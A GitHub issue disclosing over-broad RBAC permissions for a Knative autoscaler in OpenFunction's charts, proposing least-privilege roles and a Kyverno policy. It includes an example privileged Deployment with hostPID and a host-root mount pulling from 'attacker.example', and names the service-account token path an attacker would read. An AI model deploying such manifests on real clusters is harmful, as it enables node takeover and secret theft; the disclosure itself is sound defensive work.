
[BUG] Deployment autoscaler has more RBAC permissions than it needs, which may lead to the whole cluster being hijacked #65

Open
Yseona opened this issue May 2, 2024 · 1 comment


Yseona commented May 2, 2024

Hi community! Our team just found a possible security issue while reading the code. We would like to discuss whether it is a real vulnerability.

Description

The bug is that the Deployment autoscaler in the charts has more RBAC permissions than it needs, which may cause security problems; in the worst case it leads to the cluster being hijacked. The problem is that the autoscaler is bound to two ClusterRoles (knative-serving-admin-rbac.yaml#L4 and knative-serving-aggregated-addressable-resolver-rbac.yaml#L4) with the following sensitive permissions, granted through aggregation rules (knative-serving-core-rbac.yaml#L6 and knative-serving-addressable-resolver-rbac.yaml#L6); a sketch of the aggregation pattern follows the list below:

  • create/patch/update verb of the deployments resource (ClusterRole)
  • list/get verb of the secrets resource (ClusterRole)
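
To make the aggregation mechanism concrete, here is a minimal sketch of the pattern described above. The resource names and the aggregation label follow the usual Knative convention, but they are illustrative rather than copied verbatim from the chart:

```yaml
# Aggregating ClusterRole: its rules are assembled automatically from every
# ClusterRole that carries the matching label.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: knative-serving-admin
aggregationRule:
  clusterRoleSelectors:
    - matchLabels:
        serving.knative.dev/controller: "true"
rules: []   # filled in by the aggregation controller
---
# Aggregated ClusterRole carrying the sensitive rules. Because the autoscaler's
# service account is bound to knative-serving-admin, it inherits all of this.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: knative-serving-core
  labels:
    serving.knative.dev/controller: "true"   # picked up by the selector above
rules:
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["create", "update", "patch"]      # cluster-wide workload creation
  - apiGroups: [""]
    resources: ["secrets"]
    verbs: ["get", "list"]                    # reads every Secret in the cluster
```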

After reading the source code of Knative (which is an upstream project, not a part of OpenFunction), I didn't find any Kubernetes API calls that use these permissions. However, these unused permissions carry some potential risks:

  • create/patch/update verb of the deployments resource
    • A malicious user can create a privileged container from a malicious image capable of container escape, gaining root privileges on the worker node where the container is deployed. Since the malicious user controls the pod scheduling parameters (e.g., replica count, node affinity, …), they can deploy the malicious container to every (or almost every) worker node, and thereby control every (or almost every) worker node in the cluster. A sketch of such a payload follows this list.
  • list/get verb of the secrets resource
    • A malicious user can get/list all the Secrets in the cluster (since the permission is declared in a ClusterRole), including database passwords, tokens for external cloud services, etc. Even worse, if a cluster admin's token is stored in a Secret, they can use it for a cluster-level privilege escalation. This means the malicious user would be able to hijack the whole cluster.
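
For illustration, this is the kind of payload a stolen autoscaler token could submit using only the create verb on deployments. Everything here (names, namespace, image) is hypothetical; the point is that a privileged container with the host filesystem mounted is one `chroot /host` away from a root shell on the node:

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: innocuous-looking-agent   # hypothetical name chosen to blend in
  namespace: kube-system
spec:
  replicas: 10                    # scale up / add affinity to reach every node
  selector:
    matchLabels:
      app: agent
  template:
    metadata:
      labels:
        app: agent
    spec:
      hostPID: true               # see and signal host processes
      containers:
        - name: agent
          image: attacker.example/escape:latest   # hypothetical malicious image
          securityContext:
            privileged: true      # full capabilities and device access
          volumeMounts:
            - name: host
              mountPath: /host    # host root filesystem, read-write
      volumes:
        - name: host
          hostPath:
            path: /
```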

A malicious user only needs to obtain the service account token to perform the above attacks. Several ways to achieve this have already been reported in the real world:

  • Supply chain attacks: like the recent xz backdoor. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
  • RCE vulnerability in the application: any remote-code-execution vulnerability that can read local files can achieve this.

Mitigation Suggestion

  • Create a separate service account and remove all the unnecessary permissions (see the first sketch after this list)
  • Write a Kyverno or OPA/Gatekeeper policy (see the second sketch after this list) to:
    • Limit the container image, entrypoint, and commands of newly created pods. This would effectively prevent the creation of malicious containers.
    • Restrict the securityContext of newly created pods, especially enforcing that securityContext.privileged and securityContext.allowPrivilegeEscalation are false. This would prevent the attacker from escaping a malicious container. On old Kubernetes versions, PodSecurityPolicy can also be used to achieve this (it was deprecated in v1.21).
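
As a sketch of the first suggestion: a dedicated service account bound to a trimmed ClusterRole. Which verbs the autoscaler actually needs depends on its code, so the names and rules below are illustrative assumptions, showing only the shape of the change (read access kept, deployments write verbs and secrets access dropped):

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: autoscaler                 # hypothetical dedicated service account
  namespace: knative-serving
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: autoscaler-minimal         # hypothetical trimmed role
rules:
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["get", "list", "watch"]   # read-only; no create/update/patch
  # note: no rule for secrets at all
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: autoscaler-minimal
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: autoscaler-minimal
subjects:
  - kind: ServiceAccount
    name: autoscaler
    namespace: knative-serving
```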
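And a minimal Kyverno sketch of the second suggestion, enforcing the securityContext restriction. It follows Kyverno's standard validate-pattern style; the `=(...)` anchors make the fields optional but constrain them to "false" whenever they are set:

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-containers
spec:
  validationFailureAction: Enforce
  background: true
  rules:
    - name: disallow-privileged
      match:
        any:
          - resources:
              kinds:
                - Pod
      validate:
        message: "Privileged mode and privilege escalation are not allowed."
        pattern:
          spec:
            =(initContainers):
              - =(securityContext):
                  =(privileged): "false"
                  =(allowPrivilegeEscalation): "false"
            containers:
              - =(securityContext):
                  =(privileged): "false"
                  =(allowPrivilegeEscalation): "false"
```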

A Few Questions

  • Would these mitigation suggestions be applicable to OpenFunction?
  • Our team has also found other unnecessary permissions (not as sensitive as the above, but they could still cause security issues). Please tell us if you are interested; we'd be happy to share them or open a PR with a fix.

References

Several CVEs have already been assigned in other projects for similar issues.


Yseona commented May 6, 2024

Hi community,
I noticed that this issue hasn't been answered yet. Please feel free to let me know if you need more information. Our team is happy to cooperate and do what we can to resolve this issue.
